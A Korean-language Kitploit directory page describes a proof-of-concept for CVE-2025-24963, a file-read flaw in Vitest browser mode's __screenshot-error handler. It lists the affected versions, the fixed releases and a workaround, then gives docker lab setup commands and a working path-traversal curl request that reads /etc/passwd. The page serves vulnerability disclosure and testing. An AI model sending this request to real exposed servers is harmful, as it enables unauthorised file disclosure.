Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24963 — __screenshot-error 핸들러를 통해 Vitest 브라우저 모드의 로컬 파일 읽기 취약점인 CVE-2025-24963용 개념 증명 악용 코드로, 노출된 서버에서 임의 파일 공개를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/hiteshpatra/cve-2025-24963
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

__screenshot-error 핸들러를 통해 Vitest 브라우저 모드의 로컬 파일 읽기 취약점인 CVE-2025-24963용 개념 증명 악용 코드로, 노출된 서버에서 임의 파일 공개를 가능하게 합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24963 - Vitest 브라우저 모드 - 로컬 파일 읽기

​CVE-2025-24963은 @vitest/browser 패키지에 영향을 미치는 중간 심각도 취약점(CVSS 3.1 점수: 5.9)입니다. 이 패키지는 Vite 기반의 Vitest 테스트 프레임워크의 구성 요소입니다. 이 취약점은 브라우저 모드 HTTP 서버의 __screenshot-error 핸들러에서 입력 검증이 부적절하여 발생합니다. 서버가 구성 옵션 browser.api.host: true를 사용하여 네트워크에 노출되면 공격자가 특수하게 조작된 요청을 보내 서버 파일 시스템의 임의 파일에 접근할 수 있으며, 이로 인해 중요한 정보가 무단으로 유출될 가능성이 있습니다.

영향을 받는 버전

이 취약점은 다음 @vitest/browser 버전에 영향을 미칩니다:​

  • 2.0.4 ~ 2.1.8
  • 3.0.0 ~ 3.0.3​

완화 방법

이 문제는 버전 2.1.9 및 3.0.4에서 해결되었습니다. 사용자는 취약점을 완화하기 위해 가능한 한 빨리 이러한 버전 이상으로 업그레이드하는 것이 좋습니다.​

해결 방안(임시 대책)

즉시 업그레이드가 불가능한 경우, 임시 해결책으로 구성에서 browser.api.host: true를 설정하지 않아 브라우저 모드 서버를 네트워크에 노출시키지 않는 것입니다. 이렇게 하면 취약한 핸들러에 대한 외부 액세스를 차단할 수 있습니다.

환경 준비

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

참고: Vitest가 사용하는 포트는 동적입니다(예: 63315). 로그를 모니터링하고 이에 따라 -p 플래그를 조정하는 것이 좋습니다.

익스플로잇

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
도구 다운로드